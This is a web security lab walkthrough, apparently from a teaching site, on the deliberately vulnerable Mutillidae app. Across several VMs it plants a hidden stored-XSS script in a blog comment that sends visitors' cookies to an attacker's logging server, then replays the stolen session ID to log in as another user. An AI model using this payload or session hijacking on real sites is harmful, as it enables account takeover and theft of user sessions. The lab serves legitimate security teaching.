Mutillidae - Lesson 15 - Man-in-the-Middle, Persistent Covert Cross Site Scripting Injection #2

12/4/2016 Mutillidae: Lesson 15: ManintheMiddle, Persistent Covert Cross Site Scripting Injection #2
ComputerSecurityStudent (CSS) [Login] [Join Now]
HOME UNIX WINDOWS SECURITY TOOLS FORENSICS SHOPPING GET STARTED CONTACT US
|SECURITY TOOLS >> Mutillidae Project >> Mutillidae 2.5.11 >> Current Page |Views:
4428

(Mutillidae: Lesson 15)

{ ManintheMiddle, Persistent Covert Cross Site Scripting Injection Help
ComputerSecurityStudent
#2 } pay for continued
research,
resources & bandwidth
Section 0. Background Information
What is Mutillidae?
OWASP Mutillidae II is a free, open source, deliberately vulnerable
webapplication providing a target for websecurity enthusiast.
What is a ManInTheMiddle attack?
The maninthemiddle attack take on many forms. The most common form
is active network eavesdropping in which the attacker is able to gain
authentication credentials (Username, Password, SESSIONID, Cookies
Information, etc).

What is a Reflective Cross Site Scripting?
The nonpersistent (or reflected) crosssite scripting vulnerability
is by far the most common type. These holes show up when the data
provided by a web client, most commonly in HTTP query parameters or in
HTML form submissions, is used immediately by serverside scripts to
parse and display a page of results for and to that user, without
properly sanitizing the request.

What is a Persistent Cross Site Scripting Injection?
The persistent XSS vulnerability is a more devastating variant because
the injection is actually permanently stored in the blog, message
board, etc.
Imagine if a sensitive website had a poor designer did not test for
injections. A malicious person could simply put in a hidden cookie
harvester script and sit back and watch there logs for SESSION
cookies.

What is Cookies Manager+?
Cookies manager to view, edit and create new cookies. It also shows
extra information about cookies, allows edit multiple cookies at once
and backup/restore them.
In future labs, we will use Cookies Manager to help simulate a manin
themiddle attack

PreRequisite Lab
1. Mutillidae: Lesson 1: How to Install Mutillidae in Fedora 14
Note: Remote database access has been turned on to provide an
additional vulnerability.
2. BackTrack: Lesson 1: Installing BackTrack 5 R1
Note: This is not absolutely necessary, but if you are a computer
security student or professional, you should have a BackTrack VM.
3. BackTrack: Lesson 9: How To Install Firebug
Note: Firebug integrates with Firefox to put a wealth of web
development tools at your fingertips while you browse. You can
edit, debug, and monitor CSS, HTML, and JavaScript live in any web
page.
4. Mu llidae: Lesson 13: Reflected Cross Site Scrip ng Injec on #1, Man‐In‐The‐Middle
https://www.computersecuritystudent.com/SECURITY_TOOLS/MUTILLIDAE/MUTILLIDAE_2511/lesson15/index.html 1/39
Note: If you have not completed the above lab, you will not be
able to continue past Section 9:
Lab Notes
In this lab we will do the following:
1. Due to a purposeful bug in the addtoyourblog.php code, we will
use Persistent Cross Site Scripting Techniques to covert send
cookie data to a remote site.
2. In the blog, we will place a covert persistent XSS injection in a
blog to create a maninthemiddle attack.
3. We will capture the username and session credentials.
4. From a remote machine we will login with those username and
session credentials.
Legal Disclaimer
As a condition of your use of this Web site, you warrant to
computersecuritystudent.com that you will not use this Web site for
any purpose that is unlawful or that is prohibited by these terms,
conditions, and notices.
In accordance with UCC § 2316, this product is provided with "no
warranties, either express or implied." The information contained is
provided "asis", with "no guarantee of merchantability."
In addition, this is a teaching website that does not condone
malicious behavior of any kind.
You are on notice, that continuing and/or using this lab outside your
"own" test environment is considered malicious and is against the law.
© 2013 No content replication of any kind is allowed without express
written permission.
Section 1: Configure Fedora14 Virtual Machine Settings
1. Start VMware Player
Instructions
1. For Windows 7
1. Click Start Button
2. Search for "vmware player"
3. Click VMware Player
2. For Windows XP
Starts > Programs > VMware Player
2. Edit Fedora Mutillidae Virtual Machine Settings
Instructions:
1. Highlight Fedora14 Mutillidae
2. Click Edit virtual machine settings
3. Edit Network Adapter
Instructions:
1. Highlight Network Adapter
2. Select Bridged
3. Click the OK Button
Section 2: Login to Fedora14 Mutillidae
1. Start Fedora14 VM Instance
Instructions:
1. Start Up VMWare Player
2. Select Fedora14 Mutillidae
3. Play virtual machine
2. Login to Fedora14 Mutillidae
Instructions:
1. Login: student
2. Password: <whatever you set it to>.
Section 3: Open Console Terminal and Retrieve IP Address
1. Start a Terminal Console
Instructions:
1. Applications > Terminal
2. Switch user to root
Instructions:
1. su root
2. <Whatever you set the root password to>
3. Get IP Address
Instructions:
1. ifconfig a
Notes (FYI):
As indicated below, my IP address is 192.168.1.111.
Please record your IP address.
Section 4: Configure BackTrack Virtual Machine Settings
Instructions
1. For Windows 7
2. For Windows XP
2. Edit the BackTrack5R1 VM
Instructions:
1. Select BackTrack5R1 VM
2. Click Edit virtual machine settings
3. Edit Virtual Machine Settings
Instructions:
1. Click on Network Adapter
2. Click on the Bridged Radio button
3. Click on the OK Button
Section 5: Play and Login to BackTrack
1. Play the BackTrack5R1 VM
Instructions:
1. Click on the BackTrack5R1 VM
2. Click on Play virtual machine

2. Login to BackTrack
Instructions:
1. Login: root
2. Password: toor or <whatever you changed it to>.
3. Bring up the GNOME
Instructions:
1. Type startx
Section 6: Open Console Terminal and Retrieve IP Address
1. Start up a terminal window (On BackTrack5R1)
Instructions:
1. Click on the Terminal Window

2. Obtain the IP Address
Instructions:
1. ifconfig a
Note(FYI):
My IP address 192.168.1.112.
In your case, it will probably be different.
This is the machine that will be use to attack the victim machine
(Mutillidae).
Section 7: Login to Damn Vulnerable WXPSP2 (Victim Machine)
Instructions
1. For Windows 7
2. For Windows XP
Instructions:
1. Click on Damn Vulnerable WXPSP2
Note(FYI):
1. This third Virtual Machine does not have to be Windows XP. I just
need to be another Virtual Machine to demonstrate how the cookie
will be sent covertly with the victim knowing.
3. Set Network Adapter
Instructions:
1. Click on Network Adapter
2. Click on the radio button "Bridged: Connected directly to the
physical network".
4. Start Up Damn Vulnerable WXPSP2.
Instructions:
1. Start Up your VMware Player
2. Play virtual machine

5. Logging into Damn Vulnerable WXPSP2.
Instructions:
1. Username: administrator
2. Password: <Provide the Password>
6. Open a Command Prompt
Instructions:
1. Start > All Programs > Accessories > Command Prompt
7. Obtain the IP Address
Instructions:
1. In the Command Prompt type "ipconfig"
Note(FYI):
In my case, Damn Vulnerable WXPSP2's IP Address 192.168.1.116.
This is the IP Address of the Victim Machine.
Record your IP Address.
Section 8: Start Apache Webserver
1. Start Apache2 (On BackTrack5R1)
Instructions:
1. service apache2 start
2. service apache2 status
3. ps eaf | grep apache2 | grep v grep
Note(FYI):
1. Start up the apache2 webserver.
2. Display the status of the apache2 webserver.
3. See the processes of the apache2 webserver.
Section 9: Verify Cookie Script Exists
1. Verify Cookie Script Exists (On BackTrack5R1)
Instructions:
1. ls l /usr/lib/cgibin/logit.pl
2. cat /dev/null > /var/www/logdir/log.txt
3. ls l /var/www/logdir/log.txt
Note(FYI):
1. List the logit.pl script. If this script is not present, then
complete the prerequisite lab.
2. Clear the log.txt havest0r file.
3. Notice the log.txt is now a Zero Byte File.
Section 10: Open Mutillidae
1. Open Firefox (On BackTrack5R1)
Instructions:
1. Click on the Firefox Icon
Notes (FYI):
If FireFox Icon does not exist in the Menu Bar Tray, then go to
Applications > Internet > Firefox Web Browser
2. Open Mutillidae
Notes (FYI):
1. Replace 192.168.1.111 in the following URL >
http://192.168.1.111/mutillidae, with your Mutillidae's IP Address
obtained from (Section 3, Step 3)
Instructions:
1. Place the following URL in the Address Bar
http://192.168.1.111/mutillidae/

3. Reset Database
Instructions:
1. Click the Reset DB Link
Notes (FYI):
This link will remove the XSS Injection from the database.
4. Proceed with Database Reset
Instructions:
1. Click the OK Button
Section 11: Persistent Covert Cross Site Script(XSS)
1. Add to your blog
Instructions:
1. OWASP Top 10 ‐‐> A2 ‐ Cross Site Scrip ng(XSS) ‐‐> Persistent(Second Order) ‐‐> Add to your blog
2. Inspect Element
Instructions:
1. Right Click in the Comment Box
2. Click Inspect Element
Note(FYI):
1. This is not a necessary step for the injection. The goal is to
allow the injection attempt to remain on the same line instead of
being wordwrapped.
3. Change Text Area Column Length
Instructions:
1. Change 65 to 95
2. Click Close Button (See Picture)
4. Covert Cookie Harvest0r Cross Site Script (XSS) Injection
Note(FYI):
1. Replace 192.168.1.112 with your BackTrack IP Address obtained in
(Section 6, Step 2).
2. This JavaScript tells the web browser to send the cookies back to
the CGI Cookie Script on the BackTrack Machine.
Instructions:
1. Place the below text in the comment box.
<script> new Image().src="h캧�p://192.168.1.112/cgi‐bin/logit.pl?"+document.cookie;
</script>
2. Click the Save Blog Entry

5. View Cookie Harvest0r Cross Site Script (XSS) Results
Note(FYI):
1. Notice nothing is displayed under the comment cell.
2. Or are your eyes deceiving you?
6. View the Havest0r Log
Instructions:
1. cat /var/www/logdir/log.txt
Notes (FYI):
2. Although the Blog displayed nothing back to us, it was covertly
recorded in our Havest0r log.
How do you like them apples?
Section 12: Login to Mutillidae
1. Start up Internet Explo[d]er (On Damn Vulnerable WXPSP2)
Instructions:
1. Start > All Programs > Internet Explorer
2. Open the Mutillidae Application
Notes (FYI):
1. Replace 192.168.1.111 in the following URL >
http://192.168.1.111/mutillidae, with your Mutillidae's IP Address
obtained from (Section 3, Step 3)
Instructions:
1. Place the following URL in the Address Bar
http://192.168.1.111/mutillidae/
2. Click Login/Register
3. Login
Instructions:
1. Name: samurai
2. Password: samurai
3. Click the Login Button
Notes(FYI):
1. We are logging on to Mutillidae to simulate a user logging on to a
real application and being granted a Session ID.
4. View someone's blog
Instructions:
1. OWASP Top 10 ‐‐> A2 ‐ Cross Site Scrip ng (XSS) ‐‐> Persistent (Second Order) ‐‐> View
someones's blog
5. Show All Blog Entries
Instructions:
1. Select Show All from the down drop menu
2. View Blog Entries
6. View Blog Entries
Note(FYI):
1. Notice nothing is displayed under the comment cell.
2. Is this Deja Vu?
Section 13: View Havest0r Log
1. View the Havest0r Log (On BackTrack5R1)
Instructions:
Notes (FYI):
2. Notice the cookie now shows the username samurai.
3. Notice the cookie now shows the PHP Session ID, which is pretty
much equivalent to a password.
Section 14: Simulate ManInTheMiddle Attack
1. On BackTrack, Open Firefox (On BackTrack5R1)
Instructions:
1. Click on the Firefox Icon
Notes (FYI):
If FireFox Icon does not exist in the Menu Bar Tray, then go to
Applications > Internet > Firefox Web Browser
2. Start Cookies Manager+
Instructions:
1. Tools > Cookies Manager+
Notes (FYI):
Click here to install Cookie Manager+ you have not already done
so.

3. Add Cookie Entry
Instructions:
1. Click the Add Button
4. Add PHPSESSID Cookie Entry
Note(FYI):
1. Replace jri8sj5cnl6ironsqtnbpo9e21 with your PHPSESSID found in
crack_cookies.txt (See Below Picture).
2. Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address
obtained from (Section 3, Step 3).
Instructions:
1. Name: PHPSESSID
2. Content: jri8sj5cnl6ironsqtnbpo9e21
3. Host: 192.168.1.111
4. Path: /
5. Click the Save Button.
5. Add Cookie Entry
Instructions:

6. Add showhints Cookie Entry
Note(FYI):
Instructions:
1. Name: showhints
2. Content: 0
3. Host: 192.168.1.111
4. Path: /mutillidae/
5. Click the Save Button
7. Add Cookie Entry
Instructions:
8. Add username Cookie Entry
Note(FYI):
Instructions:
1. Name: username
2. Content: samurai
3. Host: 192.168.1.111
9. Add Cookie Entry
Instructions:

10. Add uid Cookie Entry
Note(FYI):
Instructions:
1. Name: uid
2. Content: 6
3. Host: 192.168.1.111
6. Click the Close Button
11. Implement ManintheMiddle Attack
Note(FYI):
2. Notice you will be automagically logged in without a password.
For this reason, it is extremely important that session
information is (1) not only encrypted, (2) but also users logout
after they finish their session.
Instructions:
1. http://192.168.1.111/mutillidae/
2. Notice that user samurai logged in without a password.
Section 15: Proof of Lab
1. On BackTrack, Start up a terminal window (On BackTrack5R1)
Instructions:
1. Click on the Terminal Window
2. Proof of Lab, (On a BackTrack Terminal)
Instructions:
1. cd
2. ls l /usr/lib/cgibin/logit.pl
4. sqlite3 ~/.mozilla/firefox/*default/places.sqlite "select * from moz_places;" | grep "add‐to‐your‐
blog" | tail ‐1
sqlite3, A command line interface for SQLite version 3
Database File, ~/.mozilla/firefox/*default/places.sqlite
select * from moz_places, Display all records from the firefox history table.
grep "add‐to‐your‐blog", Display records that only contain the string "add‐to‐your‐blog".
tail ‐1, Only display the last record.
5. date
6. echo "Your Name"
Replace the string "Your Name" with your actual name.
e.g., echo "John Gray"
Proof of Lab Instructions
1. Press both the <Ctrl> and <Alt> keys at the same time.
2. Do a <PrtScn>
3. Paste into a word document
4. Upload to Moodle

Mutillidae - Lesson 15 - Man-in-the-Middle, Persistent Covert Cross Site Scripting Injection #2

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Mutillidae - Lesson 15 - Man-in-the-Middle, Persistent Covert Cross Site Scripting Injection #2

Uploaded by

Copyright:

Available Formats

12/4/2016 Mutillidae: Lesson 15: ManintheMiddle, Persistent Covert Cross Site Scripting Injection #2

ComputerSecurityStudent (CSS) [Login] [Join Now]

HOME UNIX WINDOWS SECURITY TOOLS FORENSICS SHOPPING GET STARTED CONTACT US

You might also like

Mutillidae - Lesson 15 - Man-in-the-Middle, Persistent Covert Cross Site Scripting Injection #2

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Mutillidae - Lesson 15 - Man-in-the-Middle, Persistent Covert Cross Site Scripting Injection #2

Uploaded by

Copyright:

Available Formats

12/4/2016 Mutillidae: Lesson 15: Man­in­the­Middle, Persistent Covert Cross Site Scripting Injection #2

ComputerSecurityStudent (CSS) [Login] [Join Now]

HOME UNIX WINDOWS SECURITY TOOLS FORENSICS SHOPPING GET STARTED CONTACT US

You might also like

12/4/2016 Mutillidae: Lesson 15: ManintheMiddle, Persistent Covert Cross Site Scripting Injection #2